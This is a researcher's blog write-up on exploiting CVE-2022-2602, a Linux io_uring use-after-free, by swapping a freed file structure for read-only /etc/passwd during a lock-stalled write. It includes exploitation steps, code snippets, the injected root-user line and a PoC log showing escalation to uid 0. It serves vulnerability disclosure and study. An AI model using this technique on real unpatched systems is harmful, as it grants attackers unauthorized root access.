CVE-2022-2602: DirtyCred File Exploitation applied on an io_uring UAF

Last updated Dec 20, 2022

# Introduction

In the past few weeks, I worked with @LukeGix (checkout his blog post on the same vulnerability here) to exploit the CVE-2022-2602, a very interesting bug from multiple perspectives without a public exploit, that impacts the io_uring subsystem with an Use-After-Free vulnerability handling registered file descriptors. We used a Data-Only attack against kernel version 5.15.74 (the latest before the patch) taking inspiration from the DirtyCred technique recently presented at BlackHat USA.

# TL;DR

The vulnerability is an Use-After-Free that impacts the registered file descriptor functionality in the io_uring subsystem. It’s possible to register a file in the io_uring context, free it from the Unix Garbage Collector and re-use it with the requested io_uring operation (for example, a writev operation). To exploit the bug, it was a matter of replace the freed file structure with a read-only file (e.g. /etc/passwd), in order to write into it, and achieve a good timing with a small race window.

# Vulnerability

# Root cause

The vulnerability is an Use-After-Free in the io_uring subsystem while handling registered files. The IORING_REGISTER_FILES functionality permits to register file descriptors in the io_uring context so that the consumer (the user-land application) do not have to keep them open. It works by passing the list of file descriptors using the io_uring_register syscall. However, the Unix Garbage collector (well explained in this project zero blog post), which its entrypoint is the unix_gc function and its responsability is to de-allocate in-flight sockets, can free these registered files while io_uring is using them, causing an Use-After-Free vulnerability.

The vulnerability has been discovered and described from “Thadeu Lima de Souza Cascardo” as following:

The vulnerability is a use-after-free that happens when an io_uring request is being processed on a registered file and the Unix GC runs and frees the io_uring fd and all the registered fds. The order at which the Unix GC processes the inflight fds may lead to registered fds be freed before the io_uring is released and has the chance to unregister and wait for such requests to finish.

Putting simple, in order to trigger the vulnerability, we have to register a file descriptor that can be used in an io_uring operation (like a writev) using SQPOLL and block the write operation using userfault (as demonstrated in the public POC, however we will use something else in our exploit) that will block the kernel thread. Now, close the io_uring context from user-land, triggers unix_gc function in some way (that will free the allocated registered file) and resumes the faulted kernel thread by releasing the userfault. In that way, the UAF should be triggered (with KASAN enabled, you can see a bug report).

# Fix

The fix commit idea is pretty simple: Leave io_uring alone and let it handle these resources by itself ignoring its registered files. Simple and effective.

# Exploitation

# Exploitation strategies

The vulnerability can be approached using different techniques. Since the targeted struct file is in a dedicated cache (filp) a cross cache attack can be a viable approach, since the targeted object has a lot of interesting pointers and behaviours. However, we considered this possibility initially but we thought it would be a lot more reliabale to go with a data only technique. Replace the file struct with one in our control, perform some spray, and it could be possible (since the object is freed). Well, the idea was interesting, but we messed with a lot of things and, also if the exploit turned out quite simple, we put a lot of effort on it.

# DirtyCred: File Exploitation

The DirtyCred attack is a technique presented this year at Black Hat 2022. We are not going to further re-explain it since it has been already documented in its original paper, but what is in our intereset is the “File Exploitation” part: - Image from BH slides

The idea is pretty simple: If you replace a freed R/W file (while a kernel thread is writing into it) with a read-only file, you can write into that read-only file. But, why and how? Let’s start with the why. File permissions are checked once before writing with the write syscall, once it starts writing (file->f_op->write) no more permissions checks are performed. So, if you are able to replace the struct file (retrieved from the fd integer number installed for that specific context) with an arbitrary one (e.g. a read-only file) after permissions are granted and before its write operation, you can write into arbitrary files bypassing permission validations. Well, but how? Mainly suspending the kernel execution thread when it starts writing, using userfault, FUSE or abusing file locking (Slow Write).

We choose to go with the file locking methodology in order to write an universal exploit that does not depend on specific configurations (also FUSE could be a good alternative, since unprivilged userfault has become a standard mitigation).

I would like to tell some observations on this slow write technique, so let’s see it from the kernel perspective.

# File locking (Slow Write)

The file locking mechanism is a must feature for a kernel: If two concurrency processes are writing into the same file, the kernel must be able to account that and deal with it without loss of integrity. How the kernel does that? Using file locks. Locking is a synchronization primitive that permits to handle access to the same resource in a multi-thread environment. ext4_buffered_write_iter is the function responsible to acquire this lock when a vectored write is requested (as in our case with io_uring), in a ext4 file-sysytem, using the inode_lock (and later release it with inode_unlock), where the inode is our target file inode representation. If another thread is already writing into that node, the kernel thread is paused until the lock from the the other thread is released. When the other thread releases the file lock (calling inode_unlock), the sleeping kernel thread can resumes its execution acquiring the lock and starting to write into the file. But what if, during the sleep time, the struct file is replaced? Since permissions checks have been already done, the write action will be performed also if the re-allocated file has O_RDONLY permissions! If you look closely in the ext4_buffered_write_iter, you can see that the pointer to the struct file is retrieved from iocb->ki_filp, and the following calls will use that pointer to perform the write operation ( generic_perform_write). We used this technique to “stays” the object in the kernel and extend the race window, without using “userfault”.

# fatal_signal_pending

An issue we encountered while developing the exploit was the fatal_signal_pending call from generic_perform_write. This check ensures that the current context does not have fatal signals hanging, for example by avoiding the write operation if the process has been already closed. This was one of the issues we had to overcome that took us quite some time, since debugging these kinds of operations leads to non truthful behaviours. By the way, the resolution was just to wait until io_uring has finished its operation by monitoring our target file size:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
int main(){
	/* .. */
	stat("/etc/passwd", &st);
	int original_passwd_size = st.st_size;
	/* .. */
	while(original_passwd_size == st.st_size){
		stat("/etc/passwd", &st);
		size = st.st_size;
		sleep(2);
	}
	/* .. */
}

# Exploitation Walkthrough

We went a little bit inside the File Exploitation technique, now let’s see how we abused it in order to write our exploit. We have already seen how we can trigger the UAF in the “Root Cause” section, let’s see in details how we developed the exploit.

# Setup

First, setup the io_uring context to work with the Submission Queue Polling mechanism and register a dummy file using the io_uring_register syscall.

# Starting slow_write

Since we want to replace the userfault technique in the published POC with another one, we choose to go with the Slow Write technique. As described before, we can pause a write operation abusing the file locking mechanism. Before letting io_uring write into the registered “dummy file”, we want to “slow write” on that file (that means, write a lot of data that will take time and lock the file inode) in a way that the kernel thread responsible to perform the write operation in behalf of io_uring, will be waiting at the inode_lock call. In order to perform this slow write operation, we have been inspired from this CVE-2022-2588 exploit function. Now that the write operation is paused, is the perfect time to trigger the UAF !

# Free the registered file (trigger the UAF)

In order to trigger the UAF, we have to trigger the Unix Garbager Collector ( unix_gc) function in some way. That was not a big deal. First, because the POC already had a source line that did exactly that. Second, because every unix_* file operation calls it in its release function (example with unix_stream_ops): unix_release -> unix_release_sock -> unix_gc call.

1
close(socket(AF_UNIX, SOCK_DGRAM, 0));

With this simple one-line, unix_gc is triggered and our target file chunk should be freed!

# Replace the target chunk

Now, we have a freed chunk that can be re-used from another file allocation (since we are in a dedicated cache), and our objective is to re-allocate it with something in our control, like a sensitive file that we can open (the open syscall will allocate a struct file allocation in the filp cache) and let us perform a privileged operation by writing into it. Obviously, we went for “/etc/passwd” :}

As we described in the “DirtyCred: File Exploitation” section, since file permissions are checked once, we can easily re-allocate a read-only file, resumes the kernel thread we paused in the “Starting slow_write” section, and the write operation will be performed in that read-only file!

# Make the re-allocation more reliable

Since the filp cache can be pretty busy (a lot of file operations and socket related stuff are inside this cache), a massive spray can be performed after the unix_gc is triggered, but it can be not enough. A good approach could also be to create some “holes” before triggering the targeted chunk re-allocation (to increase the FREELIST, but without releasing entire slabs), so that the following “massive spray” of “/etc/passwd” files would be more reliable.

# Release the slow_write lock

Now that we have replaced the victim chunk with a specific file, when the slow write operation finishes, the lock is released and the io_uring kernel thread acquires the lock and starts writing into our re-allocated file ("/etc/passwd"), also if it’s allocated as read-only.

# Overwrite /etc/passwd

First, in order to just append text into “/etc/passwd” and not overwrite it from scratch, our victim file (the one that we have used as the victim chunk in our Use-After-Free) has been opened with the O_APPEND flag, that append text at the end of the file. What can we write into it? We can write a simple user using the following format, that will not require the password into “"/etc/shadow”:

1
<USER>:<HASH>:0:0:/root:/root:/bin/sh

# POC || GTFO

You can find the full exploit here: https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/ $ uname -a
Linux (none) 5.15.74 #20 SMP Sat Nov 19 14:01:51 CET 2022 x86_64 GNU/Linux
/ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:kiks,,,:/home/user:/bin/sh
/ $ id
uid=1000(user) gid=1000 groups=1000
/ $ /poc
[P] P1
[P] P2
[*] Creating thread for slow write on /tmp/rwA
[*] Sleeping while waiting that slow_write starts ..
[*][T1] Starting slow write ..
[*][T1] Slowing write...
[P] P3/P4
[P] P5
[*] Triggering unix_gc and freeing the registered fd
[*] unix_gc finished !
[P] P6
[*] Spraying target files ..
[*] Wait that slow_write finishes ..
[P] P7/P8/P9
[+][T1] slow_write finished
[+] Slow write finished .. closing io_uring fd
[*] Waits that the io_uring thread continues the writev operation while the process is still alive
[+] Everything done !
Password:
uid=0(root) gid=0 groups=0
[+] DONE
/ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:kiks,,,:/home/user:/bin/sh
pwn:$6$pwn$5m1zBfEzD3xCg.wOtCtlKePwQL3Y5UiVAQBEAIv67Ir9JfZjmjO7XwzMzk0IcRoPjtWg.k2ytbimpKp1s/RB2/:0:0:/root:/root:/bin/sh
/ $

# Extra: new KRWX feature

KRWX is a tool I developed to deepen kernel internals and to assists kernel exploitation. Since in this case it was necessary to deal with a specific special cache (filp) and this feature wasn’t implemented, I added it. Now it’s possible to retrieve the address of a specific kmem_cache using kmem_cache_get(char* name), like the following:

1
2
3
4
5
6
#include "lib/krwx.h"
int main(){
	/* .. */
	kmem_cache_get("filp");
	/* .. */
}

It will return the kernel address of the cache that can be used to allocate objects into it using the already present user-land kmem_cache_alloc() (with some internal changes to accomodate the implementation). You can find the full example here, but this is an extract:

1
2
3
4
5
6
7
8
#include "lib/krwx.h"
int main(){
	/* .. */
	filp = kmem_cache_get("filp");
	chunk = kmem_cache_alloc(filp, GFP_KERNEL);
	kmem_cache_free(filp, chunk);
	/* .. *
}

If you are interested, you can find the project on github.

# Conclusions

This is how we managed to exploit the CVE-2022-2602 using the inode locking technique. It was a really fun (and sometimes pain) adventure and it was a pleasure to have worked on it with Luca ( @LukeGix). You can take a look at his blog post to see how it’s possible to exploit the same vulnerability with userfaultd and FUSE techniques!

Stay tuned for more!

👾 @kiks